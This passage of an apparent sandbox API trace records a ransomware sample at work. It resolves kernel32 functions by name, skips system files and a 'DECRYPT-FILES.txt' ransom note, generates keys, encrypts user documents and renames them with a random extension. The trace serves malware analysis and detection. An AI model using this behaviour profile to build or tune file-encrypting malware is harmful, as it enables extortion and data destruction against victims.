(lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.965] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.965] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.965] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.965] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.965] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.965] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.965] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.965] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.965] lstrlenA (lpString="DELETEATOM") returned 10 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.965] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.965] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.965] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.965] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.966] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.966] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.966] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.966] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.966] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.966] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.966] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.966] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.966] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.966] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.966] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.966] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.966] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.966] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.966] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.966] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.966] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.966] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.966] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.967] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.967] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.967] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.967] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.967] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.967] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.967] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.967] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.967] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.967] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.967] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.967] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.967] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.967] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.967] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.967] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.967] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.968] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.968] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt") returned 75 [0083.968] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt.zTm5Eve") returned 83 [0083.968] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jfn8j-ja5_dt9.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt.zTm5Eve" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jfn8j-ja5_dt9.ppt.ztm5eve"), dwFlags=0x0) returned 1 [0083.968] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.969] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.969] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.969] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2624e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae2624e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae2624e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.969] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.969] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.969] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.969] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.969] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.969] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.969] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.969] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.969] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jkbimi8.tmp" [0083.970] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.970] CloseHandle (hObject=0x0) returned 0 [0083.970] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.970] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df75920, ftCreationTime.dwHighDateTime=0x1d4c6f4, ftLastAccessTime.dwLowDateTime=0x31902500, ftLastAccessTime.dwHighDateTime=0x1d4ca7d, ftLastWriteTime.dwLowDateTime=0x31902500, ftLastWriteTime.dwHighDateTime=0x1d4ca7d, nFileSizeHigh=0x0, nFileSizeLow=0x5648, dwReserved0=0x0, dwReserved1=0x0, cFileName="jM5KvsW.pps", cAlternateFileName="")) returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="autorun.inf") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="boot.ini") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="desktop.ini") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="ntuser.dat") returned -1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="iconcache.db") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="bootsect.bak") returned 1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="ntuser.dat.log") returned -1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="thumbs.db") returned -1 [0083.970] lstrcmpiW (lpString1="jM5KvsW.pps", lpString2="Bootfont.bin") returned 1 [0083.970] lstrlenW (lpString="jM5KvsW.pps") returned 11 [0083.970] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0083.970] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0083.971] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0083.971] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0083.971] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.971] lstrlenW (lpString="jM5KvsW.pps") returned 11 [0083.971] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.971] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="jM5KvsW.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps" [0083.971] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jm5kvsw.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.971] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=22088) returned 1 [0083.971] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.971] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.971] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.971] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.971] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.972] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.972] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.973] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.973] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.973] CloseHandle (hObject=0x42c) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.973] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.974] CloseHandle (hObject=0x0) returned 0 [0083.974] CloseHandle (hObject=0x428) returned 1 [0083.974] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.974] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.975] GetTickCount () returned 0x114d75c [0083.975] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.975] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.975] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.975] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.975] lstrlenA (lpString="kernel32.dll") returned 12 [0083.975] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.976] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.976] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.976] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.976] lstrlenA (lpString="ADDATOMA") returned 8 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.976] lstrlenA (lpString="ADDATOMW") returned 8 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.976] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.976] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.976] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.976] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.976] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.976] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.976] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.976] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.976] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.976] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.976] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.976] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.976] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.976] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.977] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.977] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.977] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, 